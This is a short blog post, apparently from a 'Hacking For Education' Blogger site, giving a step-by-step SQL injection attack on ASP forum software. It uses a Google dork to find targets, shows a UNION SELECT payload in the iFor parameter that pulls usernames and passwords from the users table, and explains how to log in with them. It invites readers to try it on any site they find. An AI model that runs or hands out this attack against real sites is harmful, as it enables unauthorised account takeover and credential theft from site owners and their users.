The Steps :

  1. Open www.Google.com and search for this - inurl:/forums.asp?iFor=
  2. Example's target - http://www.target.com/forum/forums.asp?iFor=
  3. Delete = symbol just like this - http://www.target.com/forum/forums.asp?iFor
  4. * If it is not working, find another target.
  5. Insert the Injection SQL after the = symbol that you have delete it - 12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,1 1,12+from+users
  6. Example- http://www.target.com/forum/forums.asp?iFor=12+union+select+1%2C2%2C3%2Cu_password%2C5%2Cu_id%2C7%2C8%2C9%2C10%2C1 1,12+from+users
  7. Word that come out below 10 TOPICS is the Username and the word come out below the DATED is the Password.
  8. You now can login at above of table 10 TOPICS / DATED.
Happy trying and enjoy hacking. :)

0 comments

Post a Comment

Related Posts Plugin for WordPress, Blogger...
© Copyright XAND™ | Hacking For Education 2010 - 2011. Powered by Blogger.

Networked Blog

Follow Me